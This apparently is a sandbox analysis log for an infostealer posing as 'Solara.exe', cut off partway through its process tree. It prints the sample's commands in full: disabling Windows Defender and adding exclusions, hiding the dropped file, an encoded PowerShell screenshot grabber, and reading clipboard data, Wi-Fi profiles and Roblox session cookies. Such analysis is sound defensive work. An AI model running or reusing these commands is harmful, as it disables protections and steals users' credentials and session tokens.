WMIC.exe Token: SeShutdownPrivilege 3684 WMIC.exe Token: SeDebugPrivilege 3684 WMIC.exe Token: SeSystemEnvironmentPrivilege 3684 WMIC.exe Token: SeRemoteShutdownPrivilege 3684 WMIC.exe Token: SeUndockPrivilege 3684 WMIC.exe Token: SeManageVolumePrivilege 3684 WMIC.exe Token: 33 3684 WMIC.exe Token: 34 3684 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Solara.exeBuilt.exeBootstrapperV1.23.execmd.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 892 wrote to memory of 2460 892 Solara.exe Built.exe PID 892 wrote to memory of 2460 892 Solara.exe Built.exe PID 892 wrote to memory of 4596 892 Solara.exe BootstrapperV1.23.exe PID 892 wrote to memory of 4596 892 Solara.exe BootstrapperV1.23.exe PID 2460 wrote to memory of 4992 2460 Built.exe Built.exe PID 2460 wrote to memory of 4992 2460 Built.exe Built.exe PID 4596 wrote to memory of 3872 4596 BootstrapperV1.23.exe cmd.exe PID 4596 wrote to memory of 3872 4596 BootstrapperV1.23.exe cmd.exe PID 3872 wrote to memory of 1580 3872 cmd.exe ipconfig.exe PID 3872 wrote to memory of 1580 3872 cmd.exe ipconfig.exe PID 4992 wrote to memory of 4836 4992 Built.exe cmd.exe PID 4992 wrote to memory of 4836 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2508 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2508 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2212 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2212 4992 Built.exe cmd.exe PID 2212 wrote to memory of 3264 2212 cmd.exe tasklist.exe PID 2212 wrote to memory of 3264 2212 cmd.exe tasklist.exe PID 2508 wrote to memory of 2932 2508 cmd.exe powershell.exe PID 2508 wrote to memory of 2932 2508 cmd.exe powershell.exe PID 4836 wrote to memory of 1520 4836 cmd.exe powershell.exe PID 4836 wrote to memory of 1520 4836 cmd.exe powershell.exe PID 4992 wrote to memory of 4808 4992 Built.exe cmd.exe PID 4992 wrote to memory of 4808 4992 Built.exe cmd.exe PID 4808 wrote to memory of 4388 4808 cmd.exe WMIC.exe PID 4808 wrote to memory of 4388 4808 cmd.exe WMIC.exe PID 4992 wrote to memory of 2356 4992 Built.exe powershell.exe PID 4992 wrote to memory of 2356 4992 Built.exe powershell.exe PID 2356 wrote to memory of 5084 2356 cmd.exe reg.exe PID 2356 wrote to memory of 5084 2356 cmd.exe reg.exe PID 4992 wrote to memory of 1372 4992 Built.exe cmd.exe PID 4992 wrote to memory of 1372 4992 Built.exe cmd.exe PID 1372 wrote to memory of 4856 1372 cmd.exe reg.exe PID 1372 wrote to memory of 4856 1372 cmd.exe reg.exe PID 4992 wrote to memory of 2276 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2276 4992 Built.exe cmd.exe PID 2276 wrote to memory of 3684 2276 cmd.exe WMIC.exe PID 2276 wrote to memory of 3684 2276 cmd.exe WMIC.exe PID 4992 wrote to memory of 3596 4992 Built.exe cmd.exe PID 4992 wrote to memory of 3596 4992 Built.exe cmd.exe PID 3596 wrote to memory of 4604 3596 cmd.exe WMIC.exe PID 3596 wrote to memory of 4604 3596 cmd.exe WMIC.exe PID 4992 wrote to memory of 3848 4992 Built.exe cmd.exe PID 4992 wrote to memory of 3848 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2620 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2620 4992 Built.exe cmd.exe PID 3848 wrote to memory of 3936 3848 cmd.exe WMIC.exe PID 3848 wrote to memory of 3936 3848 cmd.exe WMIC.exe PID 2620 wrote to memory of 3052 2620 cmd.exe powershell.exe PID 2620 wrote to memory of 3052 2620 cmd.exe powershell.exe PID 4992 wrote to memory of 1044 4992 Built.exe cmd.exe PID 4992 wrote to memory of 1044 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2624 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2624 4992 Built.exe cmd.exe PID 4992 wrote to memory of 4776 4992 Built.exe cmd.exe PID 4992 wrote to memory of 4776 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2452 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2452 4992 Built.exe cmd.exe PID 4992 wrote to memory of 1100 4992 Built.exe cmd.exe PID 4992 wrote to memory of 1100 4992 Built.exe cmd.exe PID 4992 wrote to memory of 2072 4992 Built.exe Conhost.exe PID 4992 wrote to memory of 2072 4992 Built.exe Conhost.exe PID 2624 wrote to memory of 3804 2624 cmd.exe tasklist.exe PID 2624 wrote to memory of 3804 2624 cmd.exe tasklist.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 3936 attrib.exe 2612 attrib.exe 2184 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara.exe"C:\Users\Admin\AppData\Local\Temp\Solara.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:4856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"5⤵
- Views/modifies file attributes
PID:3936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1044
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:4776
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:1224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:2452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1100
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2072
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4964 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:2916
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:3832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:2944
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:4916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:1540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2356 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0rvxgb2\i0rvxgb2.cmdline"6⤵PID:3380
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CEE.tmp" "c:\Users\Admin\AppData\Local\Temp\i0rvxgb2\CSC2E9928CC633944FC80343070DA3717EB.TMP"7⤵PID:1816
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4588
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1916
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:1572
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3276
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:868
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4956
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:892
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4132
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:1628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:2180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:4380
-
